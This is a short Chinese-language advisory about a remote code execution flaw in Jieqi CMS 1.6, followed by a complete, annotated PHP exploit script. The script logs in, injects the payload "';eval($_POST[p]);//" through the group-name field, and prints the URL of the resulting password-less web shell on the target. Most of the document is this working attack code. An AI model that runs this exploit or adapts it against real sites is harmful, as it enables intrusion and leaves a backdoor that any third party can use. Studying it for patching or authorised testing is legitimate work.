杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
该系统存在多个远程安全漏洞。本文报告的是 1.6 版本中的一个远程代码执行漏洞（经由创建圈子时的 gname 字段注入 PHP 代码），应该已有 2 年多历史了。
利用前提：需要一个有权创建圈子的普通用户账号（用户名和密码）；利用成功后会在目标站点留下一个无任何口令保护的 PHP 后门文件。
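<?php
/**
 * Jieqi CMS V1.6 PHP code injection exploit (proof of concept).
 *
 * Logs in as a user who is allowed to create a "group" (圈子), then submits the
 * group-creation form with a PHP payload in the `gname` field. The CMS evidently
 * copies the group name into a generated PHP file under files/group/userdir/,
 * so the payload becomes reachable at the URL this script prints at the end.
 *
 * Usage: php <this script> host path username password
 *
 * CLI arguments ($argv):
 *   host      target server (ip or hostname)
 *   path      web path of the Jieqi CMS install, e.g. /jieqicmsv1.6/
 *   username  an account that is allowed to create groups
 *   password  that account's password
 *
 * Side effects: two HTTP requests against the target, a temporary cookie-jar
 * file (removed before exit) and a persistent PHP backdoor on the target.
 *
 * Security notes for anyone running this:
 *   - The resulting "shell" has no secret: anybody who learns the info.php URL
 *     can execute code through the POST parameter `p`. Delete the created
 *     group / file when the test is finished.
 *   - Credentials travel over plain HTTP as written. Only use against systems
 *     you are authorised to test.
 *
 * Original author: flyh4t (phpsec at hotmail dot com), http://www.wolvez.org
 */

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

/* works regardless of php.ini settings */

if ($argc < 5) {
    // The original usage line omitted the (required) password argument.
    print_r('
+---------------------------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path username password
host:     target server (ip/hostname)
path:     path to jieqicms
username: a username who can create group
password: that user\'s password
Example:
php ' . $argv[0] . ' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit(1); // non-zero so a wrapper script can tell "misuse" from "done"
}

error_reporting(E_ERROR | E_WARNING | E_PARSE); // same mask as error_reporting(7)
ini_set('max_execution_time', 0);

$host     = $argv[1];
$username = $argv[3];
$password = $argv[4];

// Normalise the install path so "jieqicms", "/jieqicms" and "/jieqicms/" all
// work and an empty path does not yield a "//" in the URL.
$path = trim($argv[2], '/');
$base = 'http://' . $host . ($path === '' ? '' : '/' . $path);

// The session cookie is kept in a private temp file rather than a cookie.txt in
// the current directory, and is deleted before this script exits.
$cookie_jar = tempnam(sys_get_temp_dir(), 'jieqi_');
if ($cookie_jar === false) {
    exit("could not create a temporary cookie jar\n");
}

/* step 1: log in and collect the session cookie */

// username/password are URL-encoded so that '&', '=' or '%' inside a credential
// cannot break the form body. The remaining fields are reproduced byte-for-byte
// from the original exploit (the submit value is the pre-encoded button caption).
$login_body = 'password=' . urlencode($password)
    . '&username=' . urlencode($username)
    . '&usecookie=86400'
    . '&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B'
    . '&action=login&jumpreferer=1';

$login = curl_init();
curl_setopt($login, CURLOPT_URL, $base . '/login.php');
curl_setopt($login, CURLOPT_COOKIEJAR, $cookie_jar);
curl_setopt($login, CURLOPT_POST, 1);
curl_setopt($login, CURLOPT_POSTFIELDS, $login_body);
curl_setopt($login, CURLOPT_RETURNTRANSFER, 1); // capture instead of echoing the page
$login_page = curl_exec($login);
if ($login_page === false) {
    // Bug fix: the original passed an undefined $ch to curl_error(), so the real
    // transport error was never displayed.
    $login_err = curl_error($login);
    curl_close($login);
    unlink($cookie_jar);
    exit("cURL error during login: $login_err\nexploit failed\n");
}
curl_close($login); // flushes the cookie jar to disk

// A rejected login cannot be told apart from a successful one by curl_exec()
// alone, so at least check that the server handed out a cookie. This is a
// warning, not a hard stop, in case the install uses a different session scheme.
$has_cookie = false;
$jar_lines  = file($cookie_jar, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ((array) $jar_lines as $line) {
    // Netscape-format jar: comment lines start with '#', but HttpOnly cookies are
    // written as "#HttpOnly_<domain>..." and still count as cookies.
    if ($line[0] !== '#' || strpos($line, '#HttpOnly_') === 0) {
        $has_cookie = true;
        break;
    }
}
if (!$has_cookie) {
    fwrite(STDERR, "warning: login.php did not set any cookie; wrong credentials or path? continuing anyway\n");
}

/* step 2: create a group whose name carries the PHP payload */

$boundary = '---------------------------23281168279961';

// The group name is what ends up inside a generated PHP file. The leading "';"
// is what breaks out of the surrounding PHP source and "//" discards the rest of
// that line (the CMS template itself is not shown here; this is the original
// exploit's payload, unchanged).
$payload = '\';eval($_POST[p]);//flyh4t';

$fields = array(
    'gname'  => $payload,
    'gcatid' => '1',
    'gaudit' => '1',
    'gbrief' => '1',
);

// Hand-built multipart/form-data body (RFC 7578 line endings). The delimiter in
// the body is "--" + the boundary announced in the Content-Type header.
$body = '';
foreach ($fields as $name => $value) {
    $body .= '--' . $boundary . "\r\n"
        . 'Content-Disposition: form-data; name="' . $name . '"' . "\r\n\r\n"
        . $value . "\r\n";
}
$body .= '--' . $boundary . "--\r\n";

$create = curl_init();
curl_setopt($create, CURLOPT_URL, $base . '/modules/group/create.php');
curl_setopt($create, CURLOPT_HTTPHEADER, array(
    'Content-Type: multipart/form-data; boundary=' . $boundary,
));
curl_setopt($create, CURLOPT_COOKIEFILE, $cookie_jar);
curl_setopt($create, CURLOPT_POST, 1);
curl_setopt($create, CURLOPT_POSTFIELDS, $body);
curl_setopt($create, CURLOPT_RETURNTRANSFER, 1);
$resp       = curl_exec($create);
$create_err = curl_error($create);
curl_close($create);
unlink($cookie_jar); // session cookie no longer needed; do not leave it on disk

if ($resp === false) {
    // Bug fix: the original never checked the second curl_exec() at all.
    exit("cURL error while creating the group: $create_err\nexploit failed\n");
}

/* step 3: locate the new group's id in the response and print the backdoor URL */

// The id is the first "g=<digits>" in the reply (presumably a link or redirect to
// the new group page). The original capped it at four digits, which silently
// truncated ids >= 10000; any run of digits is accepted now.
if (!preg_match('/g=([0-9]+)/', $resp, $m)) {
    // Bug fix: the original used $shell[1] without checking the match and
    // printed a bogus URL when the group was not created.
    fwrite(STDERR, "could not find a group id in the response; the group was probably not created (not logged in, or no permission to create groups).\n");
    fwrite(STDERR, "first bytes of the reply:\n" . substr($resp, 0, 500) . "\n");
    exit(1);
}

$shell_url = $base . '/files/group/userdir/0/' . $m[1] . '/info.php';

// Note: "p" is the POST parameter that carries the PHP code to eval(), not a
// password - there is nothing protecting this backdoor from third parties.
echo "view your shell here (send PHP code in POST parameter p)\r\n";
echo $shell_url, "\r\n";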